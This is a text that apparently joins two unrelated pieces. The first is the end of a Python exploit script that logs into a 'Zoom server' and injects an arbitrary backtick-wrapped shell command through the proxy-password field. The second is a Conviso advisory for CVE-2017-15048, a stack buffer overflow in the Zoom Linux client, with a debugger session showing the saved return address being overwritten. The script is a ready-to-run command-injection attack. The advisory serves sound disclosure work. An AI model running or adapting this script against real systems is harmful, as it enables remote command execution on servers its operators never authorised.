csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
if(csrfmiddlewaretoken == None):
return -1
data = \
{'csrfmiddlewaretoken':csrfmiddlewaretoken,
'name':self.username,
'password':self.password}
headers = \
{'Host':self.target + ':' + str(self.port),
'Referer':target,
'Cookie':csrftoken}
try:
resp = session.post(target + "/login", headers=headers, data=data)
except Exception as error:
print("Error: %s" % error)
return -1
if(resp.status_code != 200 or 'Wrong' in resp.text):
print("login failed")
return -1
else:
print("login succeeded")
#
# get csrfmiddlewaretoken from /network/proxy and post cmd
#
try:
resp = session.get(target + "/network/proxy")
except Exception as error:
print("Error: %s" % error)
return -1
csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
cookies = session.cookies.get_dict()
#
# this happens with view-only users
#
if(len(cookies) < 2):
print("Error: failed to get session ID")
return -1
command = '`' + self.command + '`'
headers = \
{'Host':self.target + ':' + str(self.port),
'Referer':target,
'Cookie': \
'csrftoken=' + cookies['csrftoken'] + ';' + \
'sessionid=' + cookies['sessionid']}
data = \
{'csrfmiddlewaretoken':csrfmiddlewaretoken,
'proxyValue':1,
'proxyAddr':'localhost',
'proxyPort':8080,
'proxyName':'test',
'proxyPasswd':command}
try:
resp = session.post(target + "/network/proxy", headers=headers, data=data)
except Exception as error:
print("Error: %s" % error)
return -1
if(resp.status_code != 200):
print("something failed")
return -1
else:
print("command sent to server")
return 0
def get_token(self, body, name):
token = None
pq = PyQuery(body)
if(name == 'csrftoken'):
print("csrftoken")
if(name == 'csrfmiddlewaretoken'):
token = pq('input').attr('value')
return token
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("target",
type=str,
help="Zoom server")
parser.add_argument("-p",
"--port",
type=int,
default=5480,
help="Zoom port")
parser.add_argument("username",
type=str,
help="Valid username")
parser.add_argument("password",
type=str,
help="Valid password")
parser.add_argument("command",
type=str,
help="Command to execute (replace space with $IFS ?)")
args = parser.parse_args()
return args
def main():
args = arg_parse()
zm = Zoomer(args)
result = zm.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()
[CONVISO-17-002] - Zoom Linux Client Stack-based Buffer Overflow Vulnerability
1. Advisory Information
Conviso Advisory ID: CONVISO-17-002
CVE ID: CVE-2017-15048
CVSS v2: 6.8, (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Date: 2017-10-01
2. Affected Components
Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be
vulnerable.
3. Description
The binary /opt/zoom/ZoomLauncher is vulnerable to a buffer overflow because it concatenates a
overly long user input to a stack variable without checking if the destination buffer is long
enough to hold the data.
The binary also has important security features like canary turned off.
The client registers a scheme handler (zoommtg://) and this makes possible to trigger the
vulnerability remotely.
4. Details
gef> checksec
[+] checksec for '/opt/zoom/ZoomLauncher'
Canary : No
NX : Yes
PIE : No
Fortify : No
RelRO : Partial
gef>
gef> r $(python -c 'print "A"*1048 + "BBBBBBBB"')
Starting program: /opt/zoom/ZoomLauncher $(python -c 'print "A"*1048 + "BBBBBBBB"')
ZoomLauncher started.
Breakpoint 4, 0x00000000004025a6 in main ()
gef> x/5i $pc
=> 0x4025a6 <main+367>: call 0x4010f0 <strcat@plt>
0x4025ab <main+372>: lea rax,[rbp-0x410]
0x4025b2 <main+379>: mov rcx,0xffffffffffffffff
0x4025b9 <main+386>: mov rdx,rax
0x4025bc <main+389>: mov eax,0x0
gef> x/s $rdi
0x7fffffffd330: ""
gef> x/s $rsi
0x7fffffffdc35: 'A' <repeats 1048 times>, "BBBBBBBB"
gef> i f
Stack level 0, frame at 0x7fffffffd750:
rip = 0x4025a6 in main; saved rip = 0x7ffff7216f45
Arglist at 0x7fffffffd740, args:
Locals at 0x7fffffffd740, Previous frame's sp is 0x7fffffffd750
Saved registers:
rbp at 0x7fffffffd740, rip at 0x7fffffffd748
gef> ni
0x00000000004025ab in main ()
gef> i f
Stack level 0, frame at 0x7fffffffd750:
rip = 0x4025ab in main; saved rip = 0x4242424242424242
Arglist at 0x7fffffffd740, args:
Locals at 0x7fffffffd740, Previous frame's sp is 0x7fffffffd750
Saved registers:
rbp at 0x7fffffffd740, rip at 0x7fffffffd748
gef>
5. Solution
Upgrade to latest version.
6. Credits
Ricardo Silva <rsilva@conviso.com.br>
Gabriel Quadros <gquadros@conviso.com.br>
7. Report Timeline
Set 28, 2017 - Conviso sent first email asking for a channel to discuss the vulnerability.
Set 28, 2017 - Vendor asked the report in the current channel.
Set 28, 2017 - Conviso sent informations to reproduce the vulnerability.
Set 28, 2017 - Conviso asked if they could reproduce it.
Set 28, 2017 - Vendor replied saying that the informations were forwarded to engineering team.
Oct 5, 2017 - Vendor provided a patch candidate for testing.
Oct 5, 2017 - Conviso pointed problems in the patch.
Oct 11, 2017 - Vendor provided a patch candidate for testing.
Oct 12, 2017 - Conviso pointed problems in the patch.
Oct 23, 2017 - Conviso asked for status.
Oct 27, 2017 - Conviso asked for status.
Nov 1, 2017 - Conviso asked for status.
Nov 3, 2017 - Vendor replied.
Nov 6, 2017 - Conviso asked for status.
Nov 6, 2017 - Vendor replied.
Nov 9, 2017 - Conviso asked for status.
Nov 13, 2017 - Conviso asked for status.
Nov 15, 2017 - Conviso asked for status.
Nov 16, 2017 - Vendor provided a patch candidate for testing.
Nov 16, 2017 - The patch seems to fix the attack vector, although no further research was done.
Nov 20, 2017 - Vendor thanked and marked the issue as solved, considering the patch as a
sastifactory fix.
Nov 30, 2017 - Vendor released the version 2.0.115900.1201
8. References
https://zoom.us/download
https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux
9. About Conviso
Conviso is a consulting company specialized on application security. Our values are based on the
allocation of the adequate competencies on the field, a clear and direct speech with the market,
collaboration and partnership with our customers and business partners and constant investments
on methodology and research improvement. For more information about our company and services
provided, please check our website at www.conviso.com.br.
10. Copyright and Disclaimer
The information in this advisory is Copyright 2017 Conviso Application Security S/A and provided
so that the society can understand the risk they may be facing by running affected software,
hardware or other components used on their systems. In case you wish to copy information from
this advisory, you must either copy all of it or refer to this document (including our URL). No
guarantee is provided for the accuracy of this information, or damage you may cause your systems
in testing.